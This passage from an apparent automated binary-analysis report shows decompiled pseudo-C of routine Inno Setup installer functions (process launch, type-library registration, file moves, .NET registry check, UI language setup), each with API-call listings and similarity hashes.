                                                            					 *[fs:eax] = _t53;
                                                            					_t5 =  &_a12; // 0x624d3e
                                                            					_t7 =  &_a20; // 0x624d58
                                                            					_v8 = CreateProcessW(__edx, __ecx, _a32, _a28, _a24,  *_t7, _a16,  *_t5, _a8, _a4);
                                                            					_v20 = GetLastError();
                                                            					_pop(_t42);
                                                            					 *[fs:eax] = _t42;
                                                            					_push(E0060C0B9);
                                                            					return E0060BFB0( &_v16);
                                                            				} else {
                                                            					_v8 = 0;
                                                            					return _v8;
                                                            				}
                                                            			}











                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 0060C08C
                                                            • GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateErrorLastProcess
                                                            • String ID: >Mb$XMb
                                                            • API String ID: 2919029540-2660256435
                                                            • Opcode ID: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                            • Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
                                                            • Opcode Fuzzy Hash: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                            • Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 55%
                                                            			E006B6998(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                            				char _v8;
                                                            				struct _STARTUPINFOW _v76;
                                                            				struct _PROCESS_INFORMATION _v92;
                                                            				int _t22;
                                                            				intOrPtr _t28;
                                                            				intOrPtr _t41;
                                                            				void* _t47;
                                                            
                                                            				_v8 = 0;
                                                            				_t44 = __edx;
                                                            				_t32 = __eax;
                                                            				_push(_t47);
                                                            				_push(0x6b6a40);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t47 + 0xffffffa8;
                                                            				_push(0x6b6a5c);
                                                            				_push(__eax);
                                                            				_push(E006B6A6C);
                                                            				_push(__edx);
                                                            				E0040B550( &_v8, __eax, 4, __edi, __edx);
                                                            				E00407760( &_v76, 0x44);
                                                            				_v76.cb = 0x44;
                                                            				_t22 = CreateProcessW(0, E0040B278(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92);
                                                            				_t49 = _t22;
                                                            				if(_t22 == 0) {
                                                            					_t28 =  *0x6cded8; // 0x6d5c28
                                                            					_t8 = _t28 + 0x20c; // 0x0
                                                            					E006B68EC( *_t8, _t32, 0, _t44, _t49);
                                                            				}
                                                            				CloseHandle(_v92.hThread);
                                                            				_pop(_t41);
                                                            				 *[fs:eax] = _t41;
                                                            				_push(E006B6A47);
                                                            				return E0040A1C8( &_v8);
                                                            			}











                                                            APIs
                                                            • CreateProcessW.KERNEL32 ref: 006B6A05
                                                            • CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22
                                                              • Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                            • String ID: (\m$D
                                                            • API String ID: 3798668922-1981685662
                                                            • Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                            • Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
                                                            • Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                            • Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 48%
                                                            			E0062460C(void* __eax, void* __ebx, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				void* _t19;
                                                            				char _t20;
                                                            				void* _t34;
                                                            				intOrPtr _t39;
                                                            				intOrPtr _t45;
                                                            
                                                            				_t42 = __esi;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(_t45);
                                                            				_push(0x6246a6);
                                                            				 *[fs:eax] = _t45;
                                                            				E005C52C8(__eax,  &_v16, _t45,  *[fs:eax]);
                                                            				E0040B368( &_v8, _v16);
                                                            				_push(E0040EC28( &_v12));
                                                            				_t19 = E0040AEF4(_v8);
                                                            				_t34 = _t19;
                                                            				_push(_t34);
                                                            				L0043C244();
                                                            				if(_t19 != 0) {
                                                            					E0060CE98(L"LoadTypeLib", _t34, _t19, __esi);
                                                            				}
                                                            				_push(0);
                                                            				_push(_t34);
                                                            				_t20 = _v12;
                                                            				_push(_t20);
                                                            				L0043C24C();
                                                            				if(_t20 != 0) {
                                                            					E0060CE98(L"RegisterTypeLib", _t34, _t20, _t42);
                                                            				}
                                                            				_pop(_t39);
                                                            				 *[fs:eax] = _t39;
                                                            				_push(E006246AD);
                                                            				E0040A1C8( &_v16);
                                                            				E0040EC28( &_v12);
                                                            				return E0040A210( &_v8);
                                                            			}












                                                            APIs
                                                              • Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9
                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
                                                            • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Type$FullLoadNamePathRegister
                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                            • API String ID: 4170313675-2435364021
                                                            • Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                            • Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
                                                            • Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                            • Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E0060DAE9(void* __edx) {
                                                            				WCHAR* _t13;
                                                            				intOrPtr _t32;
                                                            				intOrPtr _t33;
                                                            				void* _t36;
                                                            
                                                            				SetFileAttributesW(E0040B278( *((intOrPtr*)(_t36 - 0x10))), 0x20);
                                                            				if(E00423A20( *((intOrPtr*)(_t36 - 0x10))) == 0) {
                                                            					E0060CE84(L"DeleteFile");
                                                            				}
                                                            				_t13 = E0040B278( *((intOrPtr*)(_t36 - 0x10)));
                                                            				if(MoveFileW(E0040B278( *((intOrPtr*)(_t36 - 0x14))), _t13) == 0) {
                                                            					E0060CE84(L"MoveFile");
                                                            				}
                                                            				_pop(_t32);
                                                            				 *[fs:eax] = _t32;
                                                            				_pop(_t33);
                                                            				 *[fs:eax] = _t33;
                                                            				_push(E0060DBD9);
                                                            				E0040A228(_t36 - 0x44, 7);
                                                            				return E0040A228(_t36 - 0x1c, 7);
                                                            			}

                                                            APIs
                                                            • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4
                                                              • Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                              • Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                              • Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                              • Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21
                                                              • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                            • String ID: DeleteFile$MoveFile
                                                            • API String ID: 3947864702-139070271
                                                            • Opcode ID: 69906e1fa498f448b67ec90ed8193f3809713f06cd0179ef74a02e782715ba36
                                                            • Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
                                                            • Opcode Fuzzy Hash: 69906e1fa498f448b67ec90ed8193f3809713f06cd0179ef74a02e782715ba36
                                                            • Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E00626F48(signed int __eax, void* __ecx, void* __edx, void* __ebp) {
                                                            				void* _v16;
                                                            				void* __ebx;
                                                            				void* _t31;
                                                            				signed int _t33;
                                                            
                                                            				_push(__ecx);
                                                            				_t31 = __edx;
                                                            				_t22 = __eax;
                                                            				_t33 = __eax & 0x0000007f;
                                                            				if( *((intOrPtr*)(0x6d6374 + _t33 * 4)) == 0) {
                                                            					if(E005C7A14(__eax, L"SOFTWARE\\Microsoft\\.NETFramework", 0x80000002,  &_v16, 1, 0) == 0) {
                                                            						E005C793C();
                                                            						RegCloseKey(_v16);
                                                            					}
                                                            					if( *((intOrPtr*)(0x6d6374 + _t33 * 4)) == 0) {
                                                            						E0060CD28(L".NET Framework not found", _t22);
                                                            					}
                                                            				}
                                                            				return E0040A5A8(_t31,  *((intOrPtr*)(0x6d6374 + _t33 * 4)));
                                                            			}

                                                            APIs
                                                              • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000003,00626DA0,00000003,00000000,006270EB,00000000,006272A5,?,00626DA0,?,00000000,00000000), ref: 00626F95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                            • API String ID: 47109696-2631785700
                                                            • Opcode ID: cda95d6e92defb5476691493b7d59d62c1fa9335c75e1bc5c16bb959f18c3f17
                                                            • Instruction ID: de5110e5fa14fd350821f7972f2051635d336fb801c9b7b6397190480774c976
                                                            • Opcode Fuzzy Hash: cda95d6e92defb5476691493b7d59d62c1fa9335c75e1bc5c16bb959f18c3f17
                                                            • Instruction Fuzzy Hash: 48F0FF31B05524AFEB10EB49FC41B5A6B9BDB85310F50213AF184C3281E631DC018BA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 47%
                                                            			E005C86E0(void* __eax, void* __ecx, void* __edx) {
                                                            				void* __ebx;
                                                            				void* __esi;
                                                            				void* _t3;
                                                            				void* _t7;
                                                            				void* _t12;
                                                            				intOrPtr* _t13;
                                                            
                                                            				_t8 = __ecx;
                                                            				_push(__ecx);
                                                            				_t7 = __edx;
                                                            				_t12 = __eax;
                                                            				if( *0x6d57f0 == 0) {
                                                            					 *0x6d57f4 = E00414020(_t7, _t12, GetModuleHandleW(L"user32.dll"), L"ChangeWindowMessageFilterEx");
                                                            					 *_t13 = 0x6d57f0;
                                                            					asm("lock xchg [edx], eax");
                                                            				}
                                                            				if( *0x6d57f4 == 0) {
                                                            					_t3 = E005C8644(_t7, _t8);
                                                            				} else {
                                                            					_t3 =  *0x6d57f4(_t12, _t7, 1, 0);
                                                            				}
                                                            				return _t3;
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA
                                                              • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                              • Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                            • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C872B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: HandleModule$AddressChangeFilterMessageProcWindow
                                                            • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                            • API String ID: 989041661-2676053874
                                                            • Opcode ID: 069d2c8e1b8fc22a779199f9f95faad227b90f375a0982a66332104caa2a493e
                                                            • Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
                                                            • Opcode Fuzzy Hash: 069d2c8e1b8fc22a779199f9f95faad227b90f375a0982a66332104caa2a493e
                                                            • Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E004698FC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* _a4, signed short _a8) {
                                                            				char _v5;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				void* _t30;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            				intOrPtr _t73;
                                                            				intOrPtr _t77;
                                                            				char _t78;
                                                            				intOrPtr _t82;
                                                            				signed short _t93;
                                                            				void* _t96;
                                                            				void* _t98;
                                                            				void* _t99;
                                                            				intOrPtr _t100;
                                                            
                                                            				_t78 = __edx;
                                                            				_t68 = __ecx;
                                                            				_t98 = _t99;
                                                            				_t100 = _t99 + 0xffffffdc;
                                                            				_v36 = 0;
                                                            				_v40 = 0;
                                                            				_v28 = 0;
                                                            				_v32 = 0;
                                                            				if(__edx != 0) {
                                                            					_t100 = _t100 + 0xfffffff0;
                                                            					_t30 = E00408A40(_t30, _t98);
                                                            				}
                                                            				_t96 = _t68;
                                                            				_v5 = _t78;
                                                            				_t67 = _t30;
                                                            				_t93 = _a8;
                                                            				_push(_t98);
                                                            				_push(0x469a4c);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t100;
                                                            				if((0x0000ff00 & _t93) != 0xff00) {
                                                            					E0046976C(E004236A4(_t96, _t93 & 0x0000ffff), 0);
                                                            					if( *((intOrPtr*)(_t67 + 4)) == 0xffffffff) {
                                                            						E00423BD0(_t96,  &_v36);
                                                            						_v24 = _v36;
                                                            						_v20 = 0x11;
                                                            						E00427D54(GetLastError(), _t67, 0, _t96);
                                                            						_v16 = _v40;
                                                            						_v12 = 0x11;
                                                            						_t73 =  *0x6cd8a8; // 0x415564
                                                            						E00429100(_t67, _t73, 1, _t93, _t96, 1,  &_v24);
                                                            						E004098C4();
                                                            					}
                                                            				} else {
                                                            					_t94 = _t93 & 0x000000ff;
                                                            					if((_t93 & 0x000000ff) == 0xff) {
                                                            						_t94 = 0x10;
                                                            					}
                                                            					E0046976C(E004236FC(_t96, _t94 & 0x0000ffff), 0);
                                                            					if( *((intOrPtr*)(_t67 + 4)) == 0xffffffff) {
                                                            						E00423BD0(_t96,  &_v28);
                                                            						_v24 = _v28;
                                                            						_v20 = 0x11;
                                                            						E00427D54(GetLastError(), _t67, 0, _t96);
                                                            						_v16 = _v32;
                                                            						_v12 = 0x11;
                                                            						_t77 =  *0x6ce1a8; // 0x41555c
                                                            						E00429100(_t67, _t77, 1, _t94, _t96, 1,  &_v24);
                                                            						E004098C4();
                                                            					}
                                                            				}
                                                            				_t28 = _t67 + 8; // 0x443d54
                                                            				E0040A5A8(_t28, _t96);
                                                            				_pop(_t82);
                                                            				 *[fs:eax] = _t82;
                                                            				_push(E00469A53);
                                                            				return E0040A228( &_v40, 4);
                                                            			}

                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A
                                                              • Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3
                                                              • Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3
                                                            • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1
                                                              • Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
                                                              • Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                            • String ID: \UA$dUA
                                                            • API String ID: 503893064-3864016770
                                                            • Opcode ID: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                            • Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
                                                            • Opcode Fuzzy Hash: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                            • Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0040DE74(signed short __eax, void* __edx) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				intOrPtr _v16;
                                                            				signed int _v20;
                                                            				short _v22;
                                                            				short _v24;
                                                            				char _v26;
                                                            				char _v32;
                                                            				void* __ebp;
                                                            				void* _t39;
                                                            				void* _t55;
                                                            				void* _t59;
                                                            				short* _t62;
                                                            				signed short _t66;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            				signed short _t79;
                                                            				void* _t81;
                                                            
                                                            				_t81 = __edx;
                                                            				_t66 = __eax;
                                                            				_v16 = 0;
                                                            				if(__eax !=  *0x6d1c0c()) {
                                                            					_v16 = E0040DE30( &_v8);
                                                            					_t79 = _t66;
                                                            					_v20 = 3;
                                                            					_t62 =  &_v26;
                                                            					do {
                                                            						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
                                                            						_t79 = (_t79 & 0x0000ffff) >> 4;
                                                            						_v20 = _v20 - 1;
                                                            						_t62 = _t62 - 2;
                                                            					} while (_v20 != 0xffffffff);
                                                            					_v24 = 0;
                                                            					_v22 = 0;
                                                            					 *0x6d1c08(4,  &_v32,  &_v20);
                                                            				}
                                                            				_t39 = E0040DE30( &_v12);
                                                            				_t67 = _t39;
                                                            				if(_t67 != 0) {
                                                            					_t55 = _v12 - 2;
                                                            					if(_t55 >= 0) {
                                                            						_t59 = _t55 + 1;
                                                            						_v20 = 0;
                                                            						do {
                                                            							if( *((short*)(_t67 + _v20 * 2)) == 0) {
                                                            								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
                                                            							}
                                                            							_v20 = _v20 + 1;
                                                            							_t59 = _t59 - 1;
                                                            						} while (_t59 != 0);
                                                            					}
                                                            					E0040B2DC(_t81, _t67);
                                                            					_t39 = E00406F28(_t67);
                                                            				}
                                                            				if(_v16 != 0) {
                                                            					 *0x6d1c08(0, 0,  &_v20);
                                                            					_t68 = E0040DE30( &_v12);
                                                            					if(_v8 != _v12 || E0040DE0C(_v16, _v12, _t68) != 0) {
                                                            						 *0x6d1c08(8, _v16,  &_v20);
                                                            					}
                                                            					E00406F28(_t68);
                                                            					return E00406F28(_v16);
                                                            				}
                                                            				return _t39;
                                                            			}

                                                            APIs
                                                            • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
                                                            • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
                                                              • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
                                                              • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Thread$LanguagesPreferred$Language
                                                            • String ID:
                                                            • API String ID: 2255706666-0
                                                            • Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                            • Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
                                                            • Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                            • Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E005CE374(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                                            				int _v8;
                                                            				int _v12;
                                                            				int _t31;
                                                            				intOrPtr* _t41;
                                                            				int _t54;
                                                            				int _t55;
                                                            
                                                            				_v8 = __ecx;
                                                            				_t54 = __edx;
                                                            				_t41 = __eax;
                                                            				MulDiv( *(__eax + 0x50), __edx, _v8);
                                                            				_v12 = MulDiv( *(_t41 + 0x54), _a8, _a4);
                                                            				if(( *(_t41 + 0x61) & 0x00000001) != 0) {
                                                            					_t55 =  *(_t41 + 0x58);
                                                            				} else {
                                                            					_t55 = MulDiv( *(_t41 + 0x58), _t54, _v8);
                                                            				}
                                                            				if(( *(_t41 + 0x61) & 0x00000002) != 0) {
                                                            					_t31 =  *(_t41 + 0x5c);
                                                            				} else {
